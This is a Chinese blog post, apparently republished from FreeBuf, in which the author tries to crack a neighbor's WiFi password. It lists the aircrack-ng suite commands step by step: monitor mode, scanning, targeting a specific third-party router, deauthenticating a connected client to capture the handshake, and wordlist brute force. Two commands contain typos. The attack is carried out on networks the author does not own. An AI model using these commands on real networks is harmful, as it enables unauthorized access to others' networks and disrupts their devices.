WiFi密码破解学习记录

WiFi密码破解学习记录
2023-2-24 08:11:21 Author: 系统安全运维(查看原文) 阅读量:33 收藏

0x01 前言

新搬的地方还没有安装WIFI，流量手机流量快烧完了，看着附近的WIFI，很是心动。于是上网搜索了一下教程进行试验，试验过程和结果，仅作为学习记录。

0x02 实验环境

台式机Kali虚拟机无线网卡菜鸡一只

0x03 实验过程

一、无线网卡安排

1.主机USB接口直接怼入无线网卡，Kali虚拟机弹窗提示，选择连接到虚拟机，选中Kali，点击确定。（看到有些教程说需要安装驱动，这可能跟所购买的无线网卡是否免驱有关，我这里是免驱版的，直接怼入即可使用。）

2.1.此时在Kali的网络连接处就可以看到，虚拟机可以搜索到附近的WIFI。说明网卡怼入成功。

2.2.打开终端输入ifconfig查看网卡，存在wlan0。也说明网卡怼入成功。

2.3.终端输入iwconfig，存在网卡wlan0，也说明网卡怼入成功。

2.4.虚拟机检查可移动设备，可以清楚的看到无线网卡的型号。也是说明网卡怼入成功。

二、握手包抓取

1.1.输入命令，清除系统中可能影响监听的进程：

airmon-ng check kall

1.2.开启网卡监听：

airmon-ng start wlan0

1.3.检查是否成功开启监听：（可以看到wlan0变成了wlan0mon，说明成功开启监听模式）

iwconfig

2.开始探测附近的WIFI：

airodump-ng wlan0mon

主要看三个参数：

BSSID：路由器的MAC地址
PWR：信号值，绝对值越低，说明信号越强
CH：当前路由器使用的信道

3.找一个信号比较强的WIFI进行监听，这里选择了一个小米的WIFI，BSSID为：64:64:4A:E3:90:41，使用的信道为1，输入命令，开始监听：

airodump-ng --bssid 64:64:4A:E3:90:41 -c 1 -w test wlan0mon

参数说明：

–bssid：路由器的MAC地址
-c：路由器使用的信道
-w：抓取的握手包名称，可以选择输出的路径，这里使用默认输出路径为根目录

下图说明：BSSID为路由器MAC地址，STATION为当前连接在路由器上的设备的MAC地址

4.另外再打开一个终端，对当前正在连接的某个设备进行攻击，使其断开与路由器的连接。（原理没有深究，大概使向目标发送大量数据，或者类似于ARP欺骗的攻击，使设备与路由器断开连接，停止攻击后，设备会自动连接上路由器，此时就可以抓取到握手包。）

aireplay-ng -0 10 -a 64:64:4A:E3:90:41 -c 9C:2E:A1:9F:9E:2F wlan0monoraireplay-ng --deauth 10 -a 64:64:4A:E3:90:41 -c 9C:2E:A1:9F:9E:2F wlan0mon

参数说明：

-0、–deauth：指定对目标进行攻击的次数
-a：路由器的MAC地址
-c：目标MAC地址

5.等待攻击完成，此时在第一个终端会显示握手包抓取成功，如下图：

6.在根目录生成有一些握手包文件，其中包含test-01.cap

二、爆破开启

1.在终端输入命令：

aircrack-ng -w /usr/share/wordlists/rockyou.txt test-01.cap

参数说明：

-w：指定一个密码文件，这里使用的是Kali自带的密码文件，可以在文件系统中找到。

PS：我一开始使用此命令时报错，缺少-w参数，然后进入密码存放文件路径中发现，自带的密码是一个压缩包，需要先解压才能用，源文件为：rockyou.txt.gz。后面的.cap文件，如果一开始更改的存放的位置需要加上完整的路径

0x04 实验结果

1.等待爆破结束：（很遗憾，密码字典不够强大，没有爆破出来，密码正确会显示在终端）

0x05 个人总结

感觉就是学习了一个工具的大概使用过程，aircrack-ng原理是使用CPU去跑包，全程不需要联网，破解速度看个人CPU的性能。

此间还看到了一个利用显卡GPU去跑字典的教程，前期一样的是抓取握手包，然后使用hashcat这个工具进行爆破，据说速度比aircrack-ng快的多。还有一些其他的工具，如：EWSA（与hashcat原理差不多）

一样做了试验，但是hashcat没跑起来，原因是：我的电脑显卡是集成显卡，太垃圾了。需要独立显卡才可以跑

文章来源 ：FreeBuf原文链接：https://www.freebuf.com/articles/wireless/279484.html

如有侵权，请联系删除

好文推荐

神兵利器 | 附下载 · 红队信息搜集扫描打点利器

神兵利器 | 分享直接上手就用的内存马（附下载）

推荐一款自动向hackerone发送漏洞报告的扫描器

欢迎关注系统安全运维

文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247517373&idx=1&sn=714f85463ee546bb8f0b017c57e0d98b&chksm=c30857cdf47fdedb27b93132868e357e57c60ebd576fc9889034c775c519109cb76c5618a569#rd
如有侵权请联系:admin#unsafe.sh